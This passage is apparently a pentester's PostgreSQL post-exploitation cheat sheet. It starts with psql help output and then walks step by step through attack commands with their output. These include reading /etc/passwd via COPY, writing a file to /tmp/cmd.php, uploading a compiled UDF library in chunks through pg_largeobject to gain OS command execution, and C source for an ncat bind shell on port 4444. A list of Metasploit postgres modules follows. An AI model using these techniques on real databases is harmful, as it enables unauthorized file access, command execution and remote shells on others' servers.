SQL COPY with data stream to the client host \echo [STRING] write string to standard output \i FILE execute commands from file \ir FILE as \i, but relative to location of current script \o [FILE] send all query results to file or |pipe \qecho [STRING] write string to query output stream (see \o) Informational (options: S = show system objects, + = additional detail) \d[S+] list tables, views, and sequences \d[S+] NAME describe table, view, sequence, or index \da[S] [PATTERN] list aggregates \db[+] [PATTERN] list tablespaces \dc[S+] [PATTERN] list conversions \dC[+] [PATTERN] list casts \dd[S] [PATTERN] show object descriptions not displayed elsewhere \ddp [PATTERN] list default privileges \dD[S+] [PATTERN] list domains \det[+] [PATTERN] list foreign tables \des[+] [PATTERN] list foreign servers \deu[+] [PATTERN] list user mappings \dew[+] [PATTERN] list foreign-data wrappers \df[antw][S+] [PATRN] list [only agg/normal/trigger/window] functions \dF[+] [PATTERN] list text search configurations \dFd[+] [PATTERN] list text search dictionaries \dFp[+] [PATTERN] list text search parsers \dFt[+] [PATTERN] list text search templates \dg[+] [PATTERN] list roles \di[S+] [PATTERN] list indexes \dl list large objects, same as \lo_list \dL[S+] [PATTERN] list procedural languages \dm[S+] [PATTERN] list materialized views \dn[S+] [PATTERN] list schemas \do[S] [PATTERN] list operators \dO[S+] [PATTERN] list collations \dp [PATTERN] list table, view, and sequence access privileges \drds [PATRN1 [PATRN2]] list per-database role settings \ds[S+] [PATTERN] list sequences \dt[S+] [PATTERN] list tables \dT[S+] [PATTERN] list data types \du[+] [PATTERN] list roles \dv[S+] [PATTERN] list views \dE[S+] [PATTERN] list foreign tables \dx[+] [PATTERN] list extensions \dy [PATTERN] list event triggers \l[+] [PATTERN] list databases \sf[+] FUNCNAME show a function's definition \z [PATTERN] same as \dp Formatting \a toggle between unaligned and aligned output mode \C [STRING] set table title, or unset if none \f [STRING] show or set field separator for unaligned query output \H toggle HTML output mode (currently off) \pset [NAME [VALUE]] set table output option (NAME := {format|border|expanded|fieldsep|fieldsep_zero|footer|null| numericlocale|recordsep|recordsep_zero|tuples_only|title|tableattr|pager}) \t [on|off] show only rows (currently off) \T [STRING] set HTML tag attributes, or unset if none \x [on|off|auto] toggle expanded output (currently off) Connection \c[onnect] {[DBNAME|- USER|- HOST|- PORT|-] | conninfo} connect to new database (currently "postgres") \encoding [ENCODING] show or set client encoding \password [USERNAME] securely change the password for a user \conninfo display information about current connection Operating System \cd [DIR] change the current working directory \setenv NAME [VALUE] set or unset environment variable \timing [on|off] toggle timing of commands (currently off) \! [COMMAND] execute command in shell or start interactive shell Variables \prompt [TEXT] NAME prompt user to set internal variable \set [NAME [VALUE]] set internal variable, or list all if no parameters \unset NAME unset (delete) internal variable Large Objects \lo_export LOBOID FILE \lo_import FILE [COMMENT] \lo_list \lo_unlink LOBOID large object operations ``` ---- ###LIST DATABASES### ``` postgres=# \l List of databases Name | Owner | Encoding | Collate | Ctype | Access privileges -----------+----------+----------+-------------+-------------+----------------------- msfdb | msfuser | UTF8 | en_US.UTF-8 | en_US.UTF-8 | postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres + | | | | | postgres=CTc/postgres (4 rows) ``` ---- ###LIST DATABASE USERS### ``` postgres=# \du List of roles Role name | Attributes | Member of -----------+------------------------------------------------+----------- msfuser | | {} postgres | Superuser, Create role, Create DB, Replication | {} ``` Please try more details about postgresql database. ---- ##LIST DIRECTORY## ``` postgres=# select pg_ls_dir('/etc'); ERROR: absolute path not allowed postgres=# select pg_ls_dir('./'); pg_ls_dir ---------------------- postmaster.opts postmaster.pid pg_logical pg_clog postgresql.auto.conf pg_hba.conf cmd.so pg_multixact postgresql.conf pg_ident.conf global pg_stat_tmp PG_VERSION pg_dynshmem pg_twophase pg_xlog pg_notify pg_snapshots pg_tblspc pg_serial pg_stat base pg_subtrans pg_replslot (24 rows) ``` ---- ##READ FILE## **method1** ``` postgres=# select pg_read_file('postgresql.conf', 0, 200); pg_read_file -------------------------------------------- # ----------------------------- + # PostgreSQL configuration file + # ----------------------------- + # + # This file consists of lines of the form:+ # + # name = value + # + # (The "=" is optional.) Whitespace m (1 row) ``` **method2** ``` postgres=# drop table pwn; ERROR: table "pwn" does not exist postgres=# CREATE TABLE pwn(t TEXT); CREATE TABLE postgres=# COPY pwn FROM '/etc/passwd'; COPY 27 postgres=# SELECT * FROM pwn limit 1 offset 0; t --------------------------------- root:x:0:0:root:/root:/bin/bash (1 row) postgres=# SELECT * FROM pwn; t ------------------------------------------------------------------------------ root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/usr/bin/nologin daemon:x:2:2:daemon:/:/usr/bin/nologin mail:x:8:12:mail:/var/spool/mail:/usr/bin/nologin ftp:x:14:11:ftp:/srv/ftp:/usr/bin/nologin http:x:33:33:http:/srv/http:/usr/bin/nologin uuidd:x:68:68:uuidd:/:/usr/bin/nologin dbus:x:81:81:dbus:/:/usr/bin/nologin nobody:x:99:99:nobody:/:/usr/bin/nologin systemd-journal-gateway:x:191:191:systemd-journal-gateway:/:/usr/bin/nologin systemd-timesync:x:192:192:systemd-timesync:/:/usr/bin/nologin systemd-network:x:193:193:systemd-network:/:/usr/bin/nologin systemd-bus-proxy:x:194:194:systemd-bus-proxy:/:/usr/bin/nologin systemd-resolve:x:195:195:systemd-resolve:/:/usr/bin/nologin systemd-journal-remote:x:999:999:systemd Journal Remote:/:/sbin/nologin systemd-journal-upload:x:998:998:systemd Journal Upload:/:/sbin/nologin avahi:x:84:84:avahi:/:/bin/false polkitd:x:102:102:Policy Kit Daemon:/:/bin/false git:x:997:997:git daemon user:/:/bin/bash colord:x:124:124::/var/lib/colord:/bin/false postgres:x:88:88:PostgreSQL user:/var/lib/postgres:/bin/bash lab:x:1000:1000::/home/notfound:/bin/bash stunnel:x:16:16::/var/run/stunnel:/bin/false dnsmasq:x:996:996:dnsmasq daemon:/:/usr/bin/nologin mongodb:x:995:2::/var/lib/mongodb:/bin/bash mysql:x:89:89::/var/lib/mysql:/bin/false sslh:x:994:994::/:/sbin/nologin (27 rows) postgres=# DROP table pwn; ``` ---- ##WRITE FILE## ``` postgres=# DROP TABLE pwn; DROP TABLE postgres=# CREATE TABLE pwn (t TEXT); CREATE TABLE postgres=# INSERT INTO pwn(t) VALUES (''); INSERT 0 1 postgres=# SELECT * FROM pwn; t -------------------------------- (1 row) postgres=# COPY pwn(t) TO '/tmp/cmd.php'; COPY 1 postgres=# DROP TABLE pwn; DROP TABLE ``` ---- ##UDF HACK## ###COMPILE SOURCE### ``` lab: / $ git clone https://github.com/sqlmapproject/udfhack/ ``` ``` lab: / $ gcc lib_postgresqludf_sys.c -I`pg_config --includedir-server` -fPIC -shared -o udf64.so lab: / $ gcc -Wall -I/usr/include/postgresql/server -Os -shared lib_postgresqludf_sys.c -fPIC -o lib_postgresqludf_sys.so lab: / $ strip -sx lib_postgresqludf_sys.so ``` ###COMMAND EXECUTION### transfrom udf.so to hex strings. ``` lab:~/ $ cat udf.so | hex ``` upload udf.so with databse features. ``` postgres=# INSERT INTO pg_largeobject (loid, pageno, data) VALUES (19074, 0, decode('079c...', 'hex')); INSERT 0 1 postgres=# SELECT lo_export(19074, 'cmd.so'); ERROR: pg_largeobject entry for OID 19074, page 0 has invalid data field size 3213 postgres=# SELECT setting FROM pg_settings WHERE name='data_directory'; setting ------------------------ /var/lib/postgres/data (1 row) ``` Library is too large, and we need to split it to some pieces. Please read https://github.com/sqlmapproject/sqlmap/issues/1170. ``` postgres=# select * from pg_largeobject; loid | pageno | data ------+--------+------ (0 rows) postgres=# SELECT setting FROM pg_settings WHERE name='data_directory'; setting ------------------------ /var/lib/postgres/data (1 row) postgres=# SELECT lo_creat(-1); lo_creat ---------- 19075 (1 row) postgres=# SELECT lo_create(11122); lo_create ----------- 11122 (1 row) postgres=# select * from pg_largeobject; loid | pageno | data ------+--------+------ (0 rows) postgres=# INSERT INTO pg_largeobject VALUES (11122, 0, decode('079c...', 'hex')); INSERT 0 1 postgres=# INSERT INTO pg_largeobject VALUES (11122, 1, decode('a28e...', 'hex')); INSERT 0 1 postgres=# INSERT INTO pg_largeobject VALUES (11122, 2, decode('1265...', 'hex')); INSERT 0 1 postgres=# INSERT INTO pg_largeobject VALUES (11122, 3, decode('c62e...', 'hex')); INSERT 0 1 postgres=# SELECT lo_export(11122, '/tmp/cmd.so'); lo_export ----------- 1 (1 row) postgres=# SELECT lo_unlink(11122); lo_unlink ----------- 1 (1 row) ``` upload library successfully, and then create Postgresql FUNCTION. ``` postgres=# CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/udf64.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE; CREATE FUNCTION postgres=# CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/udf64.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE; CREATE FUNCTION ``` Execute commands with **sys\_exec**, and nothing returns. ``` postgres=# SELECT sys_exec('id'); sys_exec ---------- 0 (1 row) ``` Please clear functions after commands execution. ``` postgres=# DROP FUNCTION sys_exec(text); DROP FUNCTION postgres=# DROP FUNCTION sys_eval(text); DROP FUNCTION ``` ###BIND SHELL### ``` // bind shell on port 4444 #include "postgres.h" #include "fmgr.h" #include #ifdef PG_MODULE_MAGIC PG_MODULE_MAGIC; #endif text *exec() { system("ncat -e /bin/bash -l -p 4444"); } ``` compile source code, ``` lab:postgres_cmd/ $ vim nc.c lab:postgres_cmd/ $ gcc nc.c -I`pg_config --includedir-server` -fPIC -shared -o nc.so lab:postgres_cmd/ $ strip -sx nc.so ``` copy nc.so to postgresql tmp path, or you can upload so file with database features. ``` lab:postgres_cmd/ $ sudo cp nc.so /tmp/systemd-private-374c1bd49d5f425ca21cca8cc6d89de7-postgresql.service-SKrVjI/tmp/nc.so ``` create FUNCTION exec for bind shell. And client connects to target. ``` postgres=# CREATE OR REPLACE FUNCTION exec() RETURNS text AS '/tmp/nc.so', 'exec' LANGUAGE C STRICT; CREATE FUNCTION postgres=# SELECT exec(); server closed the connection unexpectedly This probably means the server terminated abnormally before or while processing the request. The connection to the server was lost. Attempting reset: Failed. ``` ---- ##METASPLOIT POSTGRESQL MODULES## ``` use auxiliary/admin/postgres/postgres_readfile use auxiliary/admin/postgres/postgres_sql use auxiliary/scanner/postgres/postgres_dbname_flag_injection use auxiliary/scanner/postgres/postgres_login use auxiliary/scanner/postgres/postgres_version use auxiliary/server/capture/postgresql use exploit/linux/postgres/postgres_payload use exploit/windows/postgres/postgres_payload ``` #REFERENCES# https://github.com/sqlmapproject/udfhack/ https://github.com/sqlmapproject/sqlmap/issues/1170 http://zone.wooyun.org/content/4971 http://drops.wooyun.org/tips/6449 http://bernardodamele.blogspot.com/2009/01/command-execution-with-postgresql-udf.html